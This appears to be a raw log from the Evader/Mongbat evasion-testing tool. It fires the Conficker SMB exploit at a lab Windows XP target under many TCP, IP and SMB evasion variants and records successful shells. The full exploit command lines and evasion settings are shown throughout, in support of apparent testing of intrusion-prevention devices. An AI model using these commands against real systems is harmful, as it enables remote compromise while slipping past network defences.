- 10001 runs averaging 1.87 runs / second ; progress: 5359/43200.....2015-06-08 00:48:50 INFO
- Success. (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=39260 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=aglHj0x7Asw --evasion=[smb_opentree,smb_openpipe]tcp_chaff,"25%","chksum|nullchksum|nullflag|outofwindow|shorthdr","unmodified" --evasion=[smb_opentree,msrpc_req]tcp_paws,"75%","5","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed aglHj0x7Asx
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has random alpha bytes as payload
- Info: NetBIOS connection 10.62.90.111:39260 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .2015-06-08 00:48:51 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=54804 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=hoHhi2FG8pI --evasion=[smb_connect,smb_openpipe]tcp_chaff,"3","chksum","zero" --evasion=[smb_opentree,msrpc_req]tcp_paws,"1","7","shuffle" --verifydelay=1000 --payload=shell
- Info: Using random seed hoHhi2FG8pK
- The following evasions are applied from stage smb_connect to smb_openpipe:
- - With every 3 TCP packet a TCP chaff packet is sent. The chaff packet has:
- * Invalid TCP checksum.
- * Duplicate packet has 0x00 bytes as payload
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 7> and has shuffled original payload
- Info: NetBIOS connection 10.62.90.116:54804 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ........
- 10017 runs averaging 1.87 runs / second ; progress: 5364/43200.............
- 10030 runs averaging 1.87 runs / second ; progress: 5369/43200..........
- 10040 runs averaging 1.87 runs / second ; progress: 5374/43200.....
- 10045 runs averaging 1.87 runs / second ; progress: 5379/43200....
- 10049 runs averaging 1.87 runs / second ; progress: 5384/43200.....
- 10054 runs averaging 1.87 runs / second ; progress: 5389/43200..........Pid 18512 timed out - killed
- 2015-06-08 00:49:22 INFO
- Timed out (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=29691 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=UepWOS12Ry4 --evasion=[msrpc_bind,end]ipv4_opt,"1","inc","unmodified" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"75%","random" --verifydelay=1000 --payload=shell
- Info: Using random seed UepWOS12Ry5
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - 75% probability to add a random urgent data byte to a TCP segment.
- The following evasions are applied from stage msrpc_bind to end:
- - Every 1th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has identical payload
- Info: NetBIOS connection 10.62.90.113:29691 -> 10.35.1.207:445
- Terminated
- .....
- 10070 runs averaging 1.87 runs / second ; progress: 5394/43200..............2015-06-08 00:49:27 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=23791 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=vvbQ2wZqrA4 --evasion=[smb_opentree,msrpc_bind]smb_decoytrees,"7","4","7","random" --evasion=[smb_opentree,msrpc_req]smb_decoytrees,"5","3","7","random_msrpcreq" --verifydelay=1000 --payload=shell
- Info: Using random seed vvbQ2wZqrA6
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - Before normal SMB writes, 7 SMB trees are opened and 4 writes are performed to them. The write payload is 7 random bytes.
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Before normal SMB writes, 5 SMB trees are opened and 3 writes are performed to them. The write payload is 7 bytes of MSRPC request-like data.
- Info: NetBIOS connection 10.62.90.116:23791 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...
- 10088 runs averaging 1.87 runs / second ; progress: 5399/43200.................
- 10105 runs averaging 1.87 runs / second ; progress: 5404/43200...........
- 10116 runs averaging 1.87 runs / second ; progress: 5409/43200........
- 10124 runs averaging 1.87 runs / second ; progress: 5414/43200..2015-06-08 00:49:47 INFO
- Success. (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=37811 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=rAdEwDS3pbY --evasion=[msrpc_bind,end]smb_decoytrees,"4","2","8","random_msrpcreq" --evasion=[netbios_connect,msrpc_req]tcp_chaff,"25%","nullflag|outofwindow|shorthdr","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed rAdEwDS3pba
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - 25% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
- * NULL TCP control flags.
- * An out-of-window sequence number.
- * TCP header shorter than 20 bytes
- * Duplicate packet has random alpha bytes as payload
- The following evasions are applied from stage msrpc_bind to end:
- - Before normal SMB writes, 4 SMB trees are opened and 2 writes are performed to them. The write payload is 8 bytes of MSRPC request-like data.
- Info: NetBIOS connection 10.62.90.111:37811 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .......
- 44283 runs averaging 1.73 runs / second ; progress: 25593/432002015-06-08 06:26:03 INFO
- Success. (10.62.90.114):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=33396 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=SlCGLlc3zX8 --evasion=[smb_openpipe,msrpc_req]smb_writeandxpad,"3","random_alphanum" --evasion=[msrpc_bind,msrpc_req]tcp_paws,"25%","7","random" --verifydelay=1000 --payload=shell
- Info: Using random seed SlCGLlc3zX9
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - 3 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random alphanumeric bytes.
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 7> and has random bytes as payload
- Info: NetBIOS connection 10.62.90.114:33396 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .....
- 4550874 runs averaging 12.76 runs / second ; progress: 43175/43200.............................................................................................................................................................
- 551031 runs averaging 12.76 runs / second ; progress: 43181/43200...................................................................................................................................
- 551162 runs averaging 12.76 runs / second ; progress: 43187/43200...................................................................................................................................
- 551293 runs averaging 12.76 runs / second ; progress: 43194/43200..................................................................................................................................
- 2015-06-08 11:19:31 INFO Done.
- Printing test result
- 2015-06-08 11:19:32 INFO Mongbat test report
- Using /root/evader/evader version 2013.2.586 ( x86, o, evc4 )
- Started : 2015-06-07 23:19:29 +0300
- Finished: 2015-06-08 11:19:31 +0300